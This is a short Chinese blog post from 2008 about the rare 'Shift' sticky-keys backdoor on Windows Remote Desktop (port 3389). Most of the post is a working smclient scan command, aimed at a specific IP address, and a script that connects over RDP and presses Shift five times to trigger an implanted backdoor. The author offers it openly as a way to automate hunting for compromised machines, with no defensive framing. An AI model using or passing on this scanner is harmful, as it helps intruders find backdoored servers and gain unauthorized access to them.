• 一个罕见的3389后门

    post by Holmesian / 2008-9-23 2:17 Tuesday
    众所周知用于3389的SHIFT后门极少

    而且大部分SHIFT后门都加密

    所以手工一个一个尝试是挺傻的,写成自动扫描的话,还能让人忍受


    [quote]smclient -f:shift_backdoor.txt -s:125.91.15.254 -l:1 -v -d

    shift_backdoor.txt:
    job
    {
    connect("","","",1,1);
    sleep(2000);
    senddata("WM_KEYDOWN",16,2752513);
    senddata("WM_KEYUP",16,3223977985);
    senddata("WM_KEYDOWN",16,2752513);
    senddata("WM_KEYUP",16,3223977985);
    senddata("WM_KEYDOWN",16,2752513);
    senddata("WM_KEYUP",16,3223977985);
    senddata("WM_KEYDOWN",16,2752513);
    senddata("WM_KEYUP",16,3223977985);
    senddata("WM_KEYDOWN",16,2752513);
    senddata("WM_KEYUP",16,3223977985);
    sleep(2000);
    disconnect();
    }[/quote]